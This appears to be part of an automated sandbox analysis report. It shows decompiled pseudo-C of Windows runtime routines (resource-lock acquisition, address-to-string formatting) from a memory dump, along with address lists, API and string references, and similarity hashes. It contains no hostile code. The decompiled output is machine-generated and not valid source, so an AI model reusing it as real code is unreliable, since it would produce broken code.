						if(E009206BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E009206BA(_t124, _t142) == 0 || E00920A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x00920b21
0x00920b24
0x00920b27
0x00920b2a
0x00920b2d
0x00920b30
0x00920b33
0x00920b36
0x00920b39
0x00920b3e
0x00920c65
0x00920c68
0x00920c6a
0x00920c6f
0x0094eb42
0x00000000
0x00000000
0x0094eb48
0x0094eb48
0x00920c75
0x00920c7a
0x0094eb54
0x00000000
0x00000000
0x00000000
0x0094eb5a
0x00920c80
0x00920c84
0x0094eb98
0x00000000
0x00000000
0x0094eba6
0x00920cb8
0x00920cba
0x00920cd3
0x00920cda
0x00920ce4
0x00920ce9
0x00000000
0x00920cec
0x00920c8c
0x0094eb63
0x00000000
0x00000000
0x0094eb70
0x0094eb75
0x0094eb7d
0x00000000
0x00000000
0x0094eb8c
0x00000000
0x0094eb8c
0x00920c96
0x00000000
0x00000000
0x00920ca2
0x00920cac
0x00920cb4
0x00000000
0x00000000
0x00920b44
0x00920b47
0x00920b49
0x00000000
0x00000000
0x00920b4f
0x00920b50
0x00000000
0x00000000
0x00920b56
0x00920b62
0x00920b7c
0x00920bac
0x00920a0f
0x0094eaaa
0x00000000
0x0094eac4
0x0094eac4
0x00920bd0
0x00920bd0
0x00920bd4
0x00920bd9
0x00000000
0x00000000
0x00920bdb
0x00920be0
0x0094eb0e
0x00920a1a
0x00000000
0x00920a1a
0x0094eb1a
0x0094eb1f
0x0094eb27
0x00000000
0x00000000
0x0094eb36
0x00000000
0x0094eb36
0x00920bea
0x00000000
0x00000000
0x00920bf6
0x00920c00
0x00920c03
0x00920c0b
0x00000000
0x00920c0b
0x0094eaaa
0x00000000
0x00920a15
0x00920bb6
0x00000000
0x00920bc6
0x00920bc6
0x00920bcb
0x00920c15
0x00000000
0x00000000
0x00920c1d
0x00920c20
0x00920c21
0x00920c24
0x00920c24
0x00920c26
0x00000000
0x00920c26
0x00920bcd
0x00000000
0x00920bcd
0x00920b89
0x00920b89
0x00920b90
0x00000000
0x00000000
0x00920b96
0x00000000
0x00920b96
0x00920a04
0x00920a04
0x00920b9a
0x00920b9a
0x00920b9b
0x00920b9f
0x00000000
0x00000000
0x00000000
0x00920ba5
0x00920ac7
0x00920aca
0x0094eacf
0x00000000
0x0094eade
0x0094eade
0x0094eae3
0x00000000
0x00000000
0x0094eaf3
0x0094eaf6
0x0094eaf7
0x0094eafe
0x0094eb01
0x00000000
0x0094eb01
0x0094eacf
0x00920ad0
0x00920ad4
0x00000000
0x00000000
0x00920ada
0x00920ae6
0x00920c34
0x00000000
0x00920c47
0x00920c49
0x00920c4a
0x00920c4e
0x00920c51
0x00920c54
0x00920c57
0x00920c5a
0x00000000
0x00000000
0x00000000
0x00920c60
0x00920afb
0x00920afe
0x00920b02
0x00920b05
0x00920b08
0x00000000
0x00920b08
0x00920ae6
0x00920b44
0x009209f8
0x009209f8
0x009209f9
0x00000000
0x00000000
0x0094eaa0
0x00000000

APIs

__fassign.LIBCMT ref: 00920BF6
__fassign.LIBCMT ref: 00920CA2

Strings

:, xrefs: 00920AC7
:, xrefs: 00920BA9
., xrefs: 00920A0C

Memory Dump Source

Source File: 00000007.00000002.2350384148.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.2350379268.00000000008C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350497834.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350505200.00000000009C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350510437.00000000009C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350515602.00000000009C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350520159.00000000009D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350573478.0000000000A30000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: e7518ee24c2a4bf2819fd4e7c2a167ef7b5dd7bafd6ddcd47e9d4fd54f6df8fb
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: 1DA18DB1D0032ADFDF24CF64E8456BEB7B8BBD5304F24856AD482A724BD6349A41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00920554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00920554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009c01c0;
									_push(_t144);
									_push(0);
									_t51 = E008DF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00924FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00933F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00933F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0096217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00933F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00923915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009c01c0;
												_push(_t138);
												_push(0);
												_t58 = E008DF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00924FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00933F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00933F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0096217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00933F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00923915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00905384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E008DF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00923915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E008DF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00923915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E008DF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00923915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00905329(_t110, _t138);
																_t69 = E009053A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}

0x0092055a
0x0092055d
0x00920563
0x00920566
0x009205d8
0x009205e2
0x009205e5
0x00000000
0x009205e7
0x009205e7
0x009205ea
0x009205f3
0x009205f3
0x00920568
0x00920568
0x00920568
0x00920569
0x00920569
0x00920569
0x0092056b
0x00000000
0x00000000
0x0094217f
0x00942183
0x0094225b
0x0094225f
0x00942189
0x0094218c
0x0094218f
0x00942194
0x00942199
0x0094219d
0x009421a0
0x009421a2
0x009421ce
0x009421ce
0x009421ce
0x009421d0
0x009421d6
0x009421de
0x009421e2
0x009421e8
0x009421e9
0x009421ec
0x009421f1
0x009421f6
0x00000000
0x00000000
0x009421f8
0x009421fb
0x00942206
0x0094220b
0x0094220c
0x00942217
0x00942226
0x0094222b
0x0094222c
0x0094222f
0x00942232
0x00942235
0x00942235
0x0094223a
0x0094223f
0x00942241
0x00942243
0x00942248
0x00942248
0x0094224d
0x0094224f
0x00942262
0x00942263
0x00942268
0x00942269
0x00942269
0x00942269
0x0094226d
0x00000000
0x00000000
0x00942276
0x00942279
0x0094227e
0x00942283
0x00942287
0x0094228a
0x0094228d
0x0094228f
0x009422bc
0x009422bc
0x009422bc
0x009422be
0x009422c4
0x009422cc
0x009422d0
0x009422d6
0x009422d7
0x009422da
0x009422df
0x009422e4
0x00000000
0x00000000
0x009422e6
0x009422e9
0x009422f4
0x009422f9
0x009422fa
0x00942305
0x00942314
0x00942319
0x0094231a
0x0094231d
0x00942320
0x00942323
0x00942323
0x00942328
0x0094232d
0x0094232f
0x00942331
0x00942336
0x00942336
0x0094233b
0x0094233d
0x00942350
0x00942351
0x00942356
0x00942359
0x00942359
0x0094235b
0x0094235d
0x00905367
0x0090536b
0x00905372
0x00000000
0x00000000
0x00000000
0x00000000
0x00942363
0x00942363
0x00942369
0x0094236a
0x0094236c
0x00942371
0x00942373
0x00000000
0x00942379
0x00942379
0x0094237a
0x0094237f
0x0094237f
0x00942385
0x00942386
0x00942389
0x0094238e
0x00942390
0x00905378
0x0090537c
0x00942396
0x00942396
0x00942397
0x0094239c
0x009423a2
0x009423a3
0x009423a6
0x009423ab
0x009423ad
0x00000000
0x009423b3
0x009423b3
0x009423b4
0x009423b9
0x009423ba
0x009423ba
0x009423bc
0x009423bf
0x00000000
0x00000000
0x00939153
0x00939158
0x0093915a
0x0093915e
0x00939160
0x00000000
0x00939166
0x00939166
0x00939171
0x00939176
0x00939176
0x00000000
0x00939160
0x009423c6
0x009423ce
0x009423d7
0x009423d7
0x009423ad
0x00942390
0x00942373
0x0094233f
0x0094233f
0x00000000
0x0094233f
0x00942291
0x00942291
0x00942293
0x00942295
0x0094229a
0x009422a1
0x009422a3
0x009422a7
0x009422a9
0x00000000
0x00000000
0x009422ab
0x009422ad
0x009422af
0x00000000
0x00000000
0x00000000
0x009422af
0x009422b1
0x009422b4
0x009422b4
0x009422b6
0x009053be
0x009053be
0x009053be
0x009053c0
0x00000000
0x00000000
0x009053cb
0x009053ce
0x009053d0
0x009053d4
0x009053d6
0x00000000
0x009053d8
0x009053e3
0x009053ea
0x009053ea
0x00000000
0x009053d6
0x00000000
0x00000000
0x00000000
0x00000000
0x009422b6
0x00000000
0x0094228f
0x00942349
0x0094234d
0x00942251
0x00942251
0x00000000
0x00942251
0x009421a4
0x009421a4
0x009421a6
0x009421a8
0x009421ac
0x009421b6
0x009421b8
0x009421bc
0x009421be
0x00000000
0x00000000
0x009421c0
0x009421c2
0x009421c4
0x00000000
0x00000000
0x00000000
0x009421c4
0x009421c6
0x009421c6
0x009421c8
0x00000000
0x00000000
0x00000000
0x00000000
0x009421c8
0x009421a2
0x00000000
0x00942183
0x0092057b
0x0092057d
0x00920581
0x00920583
0x00942178
0x00000000
0x00920589
0x0092058f
0x0092058f
0x00920583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00942206

Strings

RTL: Resource at %p, xrefs: 0094221D, 0094230B
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 0094220E
RTL: Re-Waiting, xrefs: 0094223A, 00942328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009422FC

Memory Dump Source

Source File: 00000007.00000002.2350384148.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.2350379268.00000000008C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350497834.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350505200.00000000009C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350510437.00000000009C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350515602.00000000009C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350520159.00000000009D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350573478.0000000000A30000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: 7f8399c3b9ea445a357b7054912a45873d2b1d515a6ae292e473facf150e1592
Instruction ID: 793d0a2ddc17d124f23479943d463c3082c7fe029ffe019ac97662dd03e1cd72
Opcode Fuzzy Hash: 7f8399c3b9ea445a357b7054912a45873d2b1d515a6ae292e473facf150e1592
Instruction Fuzzy Hash: 91513831B442116FEB14DF19DC81FA633AEBFD8720F218229FD59DB286D965EC418B90

Uniqueness

Uniqueness Score: -1.00%

Function 009214C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E009214C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x9c2088; // 0x77561bf4
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00917707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E009213CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00917707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00917707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E008E2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E008EE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x009214c0
0x009214cb
0x009214d2
0x009214d6
0x009214da
0x009214de
0x009214e3
0x0092157a
0x0092157a
0x009214f1
0x009214f3
0x0094ea0f
0x00000000
0x0094ea15
0x00000000
0x0094ea15
0x009214f9
0x009214f9
0x009214fe
0x00921504
0x0094ea1a
0x0094ea1f
0x0094ea21
0x0094ea22
0x0094ea27
0x0094ea2a
0x0094ea2a
0x00921515
0x00921517
0x0092156d
0x00921572
0x00921575
0x00921575
0x0092151e
0x0094ea50
0x0094ea55
0x0094ea58
0x0094ea58
0x0092152e
0x00921531
0x00921533
0x00000000
0x00921535
0x00921541
0x00921549
0x00921549
0x00921533
0x009214f3
0x00921559

APIs

___swprintf_l.LIBCMT ref: 0094EA22

Part of subcall function 009213CB: ___swprintf_l.LIBCMT ref: 0092146B
Part of subcall function 009213CB: ___swprintf_l.LIBCMT ref: 00921490

___swprintf_l.LIBCMT ref: 0092156D

Strings

]:%u, xrefs: 0094EA47
%%%u, xrefs: 00921564

Memory Dump Source

Source File: 00000007.00000002.2350384148.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.2350379268.00000000008C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350497834.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350505200.00000000009C0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350510437.00000000009C4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350515602.00000000009C7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350520159.00000000009D0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2350573478.0000000000A30000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 71d5ca907205cd4976efabcda740ac7818ff484fdcb5ac6cef4c810901f504f8
Instruction ID: b86a9c3584357acc35dd5c5c0693380c57c963b60c5937a2bbfa751d57c5921c
Opcode Fuzzy Hash: 71d5ca907205cd4976efabcda740ac7818ff484fdcb5ac6cef4c810901f504f8
Instruction Fuzzy Hash: A621C372A002299BCF21DE58DC41EEAB3BCFBA0700F444551FC46D3245DB749A698BE1

Uniqueness

Uniqueness Score: -1.00%

Function 009053A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E009053A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009c01c0;
									_push(_t92);
									_push(0);
									_t37 = E008DF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00924FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00933F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00933F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0096217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00933F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00923915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00905384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E008DF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00923915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E008DF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00923915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E008DF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00923915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00905329(_t74, _t92);
													_push(1);
													_t48 = E009053A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}

0x009053ab
0x009053ae
0x009053b1
0x009053b4
0x009053b7
0x009205b6
0x009205c0
0x009205c3
0x00000000
0x009205c9
0x009205c9
0x009205cc
0x009205d5
0x009205d5
0x009053bd
0x009053bd
0x009053bd
0x009053be
0x009053be
0x009053be
0x009053c0
0x00000000
0x00000000
0x00942269
0x0094226d
0x00942349
0x0094234d
0x00942273
0x00942276
0x00942279
0x0094227e
0x00942283
0x00942287
0x0094228a
0x0094228d
0x0094228f
0x009422bc
0x009422bc
0x009422bc
0x009422be
0x009422c4
0x009422cc
0x009422d0
0x009422d6
0x009422d7
0x009422da
0x009422df
0x009422e4
0x00000000
0x00000000
0x009422e6
0x009422e9
0x009422f4
0x009422f9
0x009422fa
0x00942305
0x00942314
0x00942319
0x0094231a
0x0094231d
0x00942320
0x00942323
0x00942323
0x00942328
0x0094232d
0x0094232f
0x00942331
0x00942336
0x00942336
0x0094233b
0x0094233d
0x00942350
0x00942351
0x00942356
0x00942359
0x00942359
0x0094235b
0x0094235d
0x00905367
0x0090536b
0x00905372
0x00000000
0x00000000
0x00000000
0x00000000
0x00942363
0x00942363
0x00942369
0x0094236a
0x0094236c
0x00942371
0x00942373
0x00000000
0x00942379
0x00942379
0x0094237a
0x0094237f
0x0094237f
0x00942385
0x00942386
0x00942389
0x0094238e
0x00942390
